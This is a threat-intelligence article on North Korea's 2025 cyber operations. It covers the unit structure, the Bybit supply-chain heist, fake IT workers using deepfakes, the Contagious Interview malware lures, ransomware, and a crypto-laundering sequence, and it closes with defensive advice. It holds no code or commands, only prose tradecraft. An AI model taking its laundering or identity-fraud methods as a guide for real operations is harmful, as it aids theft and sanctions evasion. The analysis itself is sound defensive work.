When most people hear "North Korean hacker," they picture a single shadowy group running cryptocurrency heists. The reality is a structured, multi-mission intelligence apparatus with distinct units, separate objectives, and combined revenue that now constitutes a significant portion of the regime's external income. Understanding the DPRK cyber threat requires understanding the architecture behind it — not just the headline operations, but the division of labor that makes those operations possible at scale.
The fundamental organizing body is the Reconnaissance General Bureau, or RGB — North Korea's primary foreign intelligence service. Virtually every DPRK cyber threat group of significance operates under the RGB's authority, with missions assigned based on strategic priority: financial generation to fund weapons programs, intelligence collection on adversaries, disruption of South Korean systems, and increasingly, infiltration of Western technology companies through the regime's IT worker program.
These missions run in parallel. The same week a Lazarus Group subunit was laundering Ethereum stolen in the Bybit hack, Kimsuky operators were running spearphishing campaigns against South Korean think tanks, Andariel actors were staging ransomware against U.S. healthcare entities, and teams of fake IT workers were sitting in corporate Slack channels at technology companies in North America and Europe. This is not a single threat. It is a program.
The 2025 Numbers
By any measure, 2025 was the DPRK cyber apparatus's most productive year on record. Chainalysis confirmed that North Korea-linked actors stole $2.02 billion in cryptocurrency — surpassing the previous annual record of $1.7 billion set in 2022 — and accounted for 76% of all cryptocurrency service compromises globally. The cumulative total over the past four years reached at least $6.75 billion.
2025 (record)
compromises (DPRK)
by IT workers
personnel (est.)
The IT worker program, tracked separately from the hacking operations, infiltrated over 320 companies in the twelve months covered by CrowdStrike's 2025 Threat Hunting Report — a 220% increase over the prior year period. South Korea's National Intelligence Service estimated North Korea's cyber workforce grew from 6,800 personnel in 2022 to 8,400 by 2024, encompassing IT worker infiltrators, cryptocurrency thieves, and military hackers operating across multiple units.
The Bybit hack alone — a single operation executed on February 21, 2025 — accounted for $1.5 billion of the year's total, representing one-third of all cryptocurrency stolen globally in 2025. It set a new record as the largest cryptocurrency heist in history, surpassing the Ronin Network breach, and would rank as the largest bank robbery in recorded history if Bybit were classified as a traditional financial institution.
The RGB Structure: Who Operates What
The Lazarus Group label has become a source of significant confusion in threat intelligence. It is used in public reporting as an umbrella term covering multiple distinct RGB subunits, each with different targeting mandates, toolsets, and operational focuses. Understanding the actual structure matters because attribution at the "Lazarus" level is too coarse to drive meaningful defensive decisions.
| Group / Aliases | RGB Unit | Primary Mission | Key Targets |
|---|---|---|---|
| TraderTraitor Jade Sleet, Slow Pisces |
RGB 3rd Bureau (Lab 110) | Financial theft | Crypto exchanges, DeFi protocols, blockchain developers |
| Andariel Onyx Sleet, Silent Chollima, Stonefly |
RGB 3rd Bureau | Espionage + ransomware | Defense, aerospace, nuclear, engineering; U.S. healthcare (ransomware) |
| Kimsuky APT43, Emerald Sleet, Velvet Chollima, Springtail |
RGB (5th Bureau) | Intelligence collection | Think tanks, government, journalists, academia, South Korean institutions |
| Diamond Sleet Selective Pisces, TEMP.Hermit, ZINC |
RGB 3rd Bureau | Espionage + destruction | Media, defense, IT organizations; network disruption |
| Moonstone Sleet formerly Storm-1789 |
RGB-linked | Financial + espionage | Software developers, defense contractors, education; custom ransomware (FakePenny) |
| Famous Chollima Jasper Sleet (IT workers) |
Department 53 | Revenue generation | Any remote-friendly employer; technology companies, crypto firms, U.S. government contractors |
| APT37 Ricochet Chollima, ScarCruft |
Ministry of State Security | Domestic + regional espionage | North Korean defectors, South Korean civil society, human rights organizations |
A key operational reality is that these groups are not siloed. CISA has documented Andariel launching ransomware attacks against U.S. healthcare entities on the same day as conducting cyber espionage against the same or adjacent targets. Kimsuky has used cybercrime to fund espionage operations. Moonstone Sleet, identified by Microsoft in 2024 as a distinct actor, combines financially motivated theft with espionage objectives and has been observed as a Qilin ransomware affiliate — blurring the line between state-directed cyber operations and the broader criminal ecosystem.
The Bybit Operation: How $1.5 Billion Disappeared in 30 Minutes
The February 21, 2025 compromise of Bybit is the defining DPRK cyber operation of the year and deserves granular attention — not for its scale alone, but for what the attack methodology reveals about the sophistication of DPRK financial operations.
Bybit used Safe, an open-source multisignature wallet platform, to manage its Ethereum holdings. Any transaction required multiple cryptographic signatures from authorized Bybit personnel before it could execute. This is a standard security control designed precisely to prevent single-point compromise. The Lazarus subunit operating as TraderTraitor understood this and targeted the control at its source.
The operation began well before February 21. TraderTraitor actors — described by investigators as having prepared for "definitely more than a month, probably many months" — identified and compromised a system administrator at Safe through what was likely a phishing attack. That administrator had elevated access to Safe's live website and codebase. The attackers used that access to implant dormant malicious JavaScript directly into the Safe interface that Bybit's signers were using.
When a Bybit employee opened Safe to authorize a routine cold-to-warm wallet transfer, the dormant code activated. The signing interface displayed the correct destination address and a legitimate-looking transaction. Underneath, the malicious JavaScript had swapped in different smart contract logic. The employee unknowingly authorized the malicious command. Within 30 minutes, approximately 500,000 ETH — worth $1.5 billion — had been redirected to addresses controlled by North Korea. Two minutes after execution, Safe's website was updated by the attackers to erase the code snippet and cover the tracks.
"The stolen cryptocurrency doesn't go to fancy cars and expensive watches. It goes to centrifuges and warheads." — CryptoImpactHub analysis, 2025
The FBI attributed the operation to TraderTraitor on February 26, 2025, releasing 51 Ethereum addresses used in laundering and urging cryptocurrency service providers to block associated transactions. By March 20, Bybit CEO Ben Zhou reported that TraderTraitor had already converted 86.29% of the stolen ETH to Bitcoin through a dizzying chain of intermediary wallets, decentralized exchanges, and cross-chain bridges. The 45-day laundering window following major heists has become a predictable operational pattern for DPRK crypto operations.
The Bybit operation was not a direct attack on Bybit. It was a supply chain attack on a trusted third-party tool. Bybit's own infrastructure was not compromised — the attack entered through a developer at Safe. Organizations relying on open-source or third-party wallet infrastructure, signing tools, or any software that intermediates high-value financial transactions need to treat their tooling vendors as part of their own attack surface.
The IT Worker Army: A Threat HR Wasn't Built to Detect
The DPRK IT worker scheme is structurally different from every other threat covered in this article, and that structural difference is exactly what makes it so effective. This is not a technical intrusion. It is a human resources problem that produces technical consequences.
North Korea trains young men in technology, deploys them in teams of four or five to locations across China, Russia, Nigeria, Cambodia, the United Arab Emirates, and elsewhere, and directs them to secure remote employment at Western technology companies using fabricated identities. The program operates under Department 53 of the RGB and generates revenue — individual workers can earn an average of $300,000 per year in legitimate salaries, with a typical four-to-five person cell generating up to $3 million annually, all of which flows back to Pyongyang.
What changed dramatically in 2025 was the integration of AI at every stage of the operation. Okta Threat Intelligence documented facilitators using generative AI tools to optimize job applications, craft responses to technical screening questions, fabricate profile photographs, overcome language barriers in written communications, and run mock AI-agent interviews to evaluate the effectiveness of deepfake overlays before live video calls. CrowdStrike observed IT workers paying premium prices for real-time face-swapping subscriptions and using them during video interviews — with a single operator capable of interviewing for the same position multiple times under different synthetic personas.
Unit 42 researchers demonstrated in April 2025 that a researcher with no prior image manipulation experience could create a convincing synthetic identity for video interviews in approximately 70 minutes using freely available tools and a five-year-old computer. The barrier to running this operation at scale is no longer technical. It is organizational.
The Department of Justice's June 30, 2025 enforcement action identified over 100 U.S. companies as victims in a single scheme, including searches of 29 suspected laptop farms across 16 states. One facilitator allowed DPRK nationals based in Shenyang, China, to use his identity to secure employment at the FAA and at least 12 other U.S. companies. The program has reached U.S. government contractors and federal agencies.
The threat has also evolved beyond simple salary diversion. The FBI confirmed in January 2025 that it had observed IT workers engaging in data theft and extortion — exfiltrating proprietary code and sensitive data, then demanding ransom to prevent its release. Secureworks' Counter Threat Unit noted that the program's economic pressure is driving this shift: "No longer are they just after a steady paycheck — they are looking for higher sums, more quickly, through data theft and extortion, from inside the company defenses."
Google's Threat Intelligence Group identified one individual operating 12 separate personas simultaneously across the U.S. and Europe. Amazon blocked 1,800 suspect applications. Microsoft suspended 3,000 known Microsoft consumer accounts created by DPRK IT workers. The program is not a fringe operation run by a handful of actors — it is an industrialized infiltration campaign with measurable organizational infrastructure behind it.
The Contagious Interview Campaign
Separate from — though operationally related to — the IT worker infiltration scheme is Contagious Interview, a long-running campaign that targets job seekers rather than infiltrating companies. In Contagious Interview operations, DPRK-linked actors operate as fake recruiters on LinkedIn and freelancing platforms, approaching developers, cryptocurrency professionals, and AI researchers with job opportunities. The workflow leads targets through a staged hiring process that ultimately delivers malware.
SentinelLabs identified over 230 confirmed victims between January and March 2025 alone, with the actual total assessed as significantly higher. The campaign continued to evolve throughout the year — Validin documented a highly polished variant in November 2025 using a fully realized fake SaaS product called "Lenvny," presented as an AI-powered interview tool, to lure AI researchers specifically. The sophistication of the lure infrastructure had reached a level the researchers described as "dangerously convincing."
The standard Contagious Interview attack chain runs: LinkedIn message → staged interview process → video response request → "fix your webcam" ClickFix prompt → malware delivery. The BeaverTail infostealer and InvisibleFerret backdoor are among the payloads most consistently associated with the campaign, with the malware ultimately used for credential theft, lateral movement, and cryptocurrency wallet exfiltration.
Kimsuky: The Intelligence Collector
Where Lazarus-umbrella units focus heavily on financial theft, Kimsuky — also tracked as APT43, Emerald Sleet, Velvet Chollima, and Springtail — operates primarily as an intelligence collection apparatus. Its mission is to gather information useful to Pyongyang on foreign policy, diplomatic positions, defense programs, and the activities of South Korean institutions and individuals who could threaten the regime.
Kimsuky's targeting profile is distinct from the financially motivated units: government employees, foreign policy think tanks, academics, journalists, human rights organizations, and South Korean institutions involved in North Korean affairs. The group is also known to target North Korean defectors and individuals who assist defectors — an enforcement mission that extends the regime's coercive reach beyond its borders.
The group has been active since at least 2014 and uses a combination of spearphishing and moderately sophisticated technical capabilities. It has deployed a rotating toolkit of malware including AppleSeed, the Gomir Linux backdoor, TRANSLATEXT (a browser extension targeting South Korean academia), and the Troll Stealer. Its February 2025 DEEP#DRIVE campaign used trusted cloud platforms including Google Docs, Dropbox, and OneDrive as delivery mechanisms for targeted attacks — a pattern of abusing legitimate infrastructure to evade detection that has become standard across the DPRK toolkit.
Mandiant's APT43 reporting specifically highlighted Kimsuky's use of cybercrime to fund espionage operations — stealing cryptocurrency not as an end goal but as a mechanism to pay for the operational costs of intelligence collection. This blending of criminal and espionage activities makes Kimsuky harder to categorize than groups with a single clear mission.
Andariel: The Dual-Use Unit
Andariel — also tracked as Onyx Sleet, Silent Chollima, and Stonefly — is among the clearest examples of how DPRK cyber operations blur the line between financial crime and state espionage. Under the RGB's 3rd Bureau, Andariel conducts intrusions targeting defense, aerospace, nuclear, and engineering entities to acquire sensitive technical information and intellectual property. Its espionage mission is directly tied to the regime's weapons development ambitions.
At the same time, Andariel funds its espionage activity through ransomware operations against U.S. healthcare entities. CISA has documented the group launching ransomware attacks and conducting cyber espionage operations against the same target on the same day. The ransomware income from healthcare victims generates the operational budget for intrusions into defense contractors. The healthcare sector is collateral damage in a state weapons program.
Andariel's initial access methodology favors exploitation of known vulnerabilities in public-facing web servers, including Log4j, to deploy web shells that provide persistent access to internal networks. Once inside, the group conducts lateral movement toward systems holding technical specifications, engineering documents, and research data relevant to the regime's military priorities.
Moonstone Sleet: The Newest Hybrid Threat
Moonstone Sleet, identified by Microsoft in May 2024 and increasingly active in 2025, represents the evolution of the DPRK threat model toward hybrid financial and espionage operations with a distinctive social engineering component.
The group sets up fake companies and fabricated job opportunities to lure developers and technical professionals into executing malicious code. It has used fake npm packages distributed via LinkedIn and freelancing platforms, trojanized versions of legitimate tools including PuTTY, and even a fully functional malicious game — DeTankWar, presented as a blockchain project — as malware delivery vehicles. The group's custom ransomware, FakePenny, was first observed in April 2024 and represents one of the only documented cases of a DPRK unit deploying ransomware as a primary tool rather than a side revenue stream.
Bitdefender's November 2025 reporting linked Moonstone Sleet to a massive increase in ransomware attacks on South Korea, with the country temporarily becoming the second most targeted ransomware victim globally — highly unusual for a country that typically does not rank in the top five. The campaign operated through Qilin's RaaS affiliate program, making Moonstone Sleet the first DPRK-linked group confirmed to have participated in a Russian criminal ransomware operation as an affiliate. Microsoft's separate reporting on shared infrastructure between Moonstone Sleet and Russian-aligned Gamaredon — with the same IP serving both groups within days — suggests the Russia-DPRK operational relationship in cyberspace is deepening.
Symantec has also pointed to Lazarus Group working with Medusa Ransomware, another group believed to operate out of Russia. The use of Russian criminal RaaS infrastructure by DPRK actors creates a new attribution problem: attacks that appear to be Russian criminal ransomware may involve DPRK operators as affiliates, and vice versa. Traditional state-centric threat models were not designed for this level of criminal-state operational overlap.
The Money Laundering Infrastructure
Stealing cryptocurrency at the scale DPRK operations operate requires an equally sophisticated laundering infrastructure — and this is an area where the regime has built durable, multi-layered capability over years of operation.
The standard DPRK laundering pattern following a major crypto heist follows a rapid, predictable sequence. Stolen assets are first converted to Bitcoin — preferred for its UTXO transaction model, which is harder to trace than Ethereum's account-based model. Funds then move through a cascade of intermediary wallets, decentralized exchanges where no KYC is required, and cross-chain bridges to hop across blockchains and break the tracing chain. The entire process from initial conversion to near-untraceable dispersion takes approximately 45 days based on documented post-incident analysis.
Chainalysis noted that DPRK actors make heavy use of professional Chinese-language money laundering services and over-the-counter brokers, consistent with Pyongyang's historical reliance on China-based networks to access international financial systems. U.S. sanctions have increasingly targeted Chinese and Russian OTC brokers and shell companies facilitating DPRK proceeds, but the networks adapt faster than sanctions can follow.
The regime's accumulated cryptocurrency reserves — $6.75 billion over four years — have been described by analysts as a shadow national treasury: a sanctions-resistant reserve fund held in a form that no government can freeze, confiscate, or audit through conventional financial mechanisms. U.S. and UN officials now openly state that cryptocurrency theft directly funds North Korea's weapons of mass destruction programs.
What Organizations Need to Do
The DPRK threat is unusual because it operates simultaneously across the technical, human, and financial attack surfaces. Defending against it requires specific attention to vectors that many security programs treat as secondary.
For organizations handling cryptocurrency or digital assets
The Bybit operation made clear that multisig wallet security is only as strong as the weakest link in the signing infrastructure — which includes every third-party tool or service that mediates the signing process. Treat your wallet tooling vendors as part of your own attack surface. Audit the integrity of signing interfaces before authorizing high-value transactions, implement out-of-band verification for large transfers, and segment developer environments from production wallet infrastructure.
For organizations hiring remote technical workers
The IT worker threat is a hiring process problem before it is a security problem. Standard background checks are not sufficient when applicants are using AI-generated documentation, deepfake video in live interviews, and facilitators who physically handle corporate laptops at domestic addresses. Detection requires HR and security operating together: live unscripted video challenges that expose deepfake artifacts, device geolocation monitoring from day one, IP-locking remote workers to expected regions, and continuous behavioral monitoring for anomalous data access patterns after onboarding. Any remote candidate who routes corporate equipment to a third-party address before setup should be treated as a red flag without exception.
For defense contractors, aerospace, and engineering firms
Andariel's targeting mandate is directly aligned with the technical specifications and intellectual property that defense industrial base companies hold. Exploitation of Log4j and similar known vulnerabilities in public-facing systems remains a primary initial access vector — patch cadence for internet-exposed infrastructure must be treated as a critical operational priority, not a routine IT task. Segment systems holding sensitive technical documentation from networks reachable from the public internet.
For any organization
Kimsuky's spearphishing operations are well-resourced, personalized, and designed to target individuals with access to strategically valuable information. Security awareness training that covers North Korean-specific social engineering tactics — including fake job offers, fabricated research collaboration invitations, and impersonation of known contacts — is relevant beyond the organizations that would traditionally consider themselves DPRK targets. The regime's targeting scope has expanded substantially as its revenue mandates have grown.
Key Takeaways
- The DPRK cyber threat is a multi-mission program, not a single group. Distinct units operate under the RGB with different targets and methodologies. Attribution to "Lazarus" without further specification is too imprecise to drive meaningful defensive action.
- 2025 was the record year for DPRK crypto theft. $2.02 billion stolen, $6.75 billion cumulative over four years — these funds directly finance weapons programs. Cryptocurrency platforms and any organization touching digital assets are priority targets.
- The IT worker program is a hiring crisis, not just a security crisis. North Korean operators are inside corporate environments with legitimate access, earning legitimate salaries, and in some cases stealing data and extorting their employers. HR and security must work together to address this threat.
- Supply chain is the preferred attack vector for high-value targets. Bybit was not compromised directly. A third-party developer tool was. The regime has demonstrated consistent ability to identify and exploit trusted intermediaries — wallet providers, software platforms, identity tools, and developer services — to reach otherwise well-defended targets.
- The Russia-DPRK operational relationship in cyberspace is deepening. Moonstone Sleet operating as a Qilin affiliate, Lazarus infrastructure overlapping with Gamaredon, and DPRK actors using Russian criminal networks for laundering all point toward an alignment that undermines the traditional assumption that nation-state and criminal cyber threats are separate problems.
- AI has materially lowered the barrier to IT worker infiltration. Deepfake interviews, AI-generated applications, and LLM-assisted technical performance have made fake candidates significantly harder to screen out with conventional hiring processes. Organizations must update their identity verification workflows or accept this risk as a given.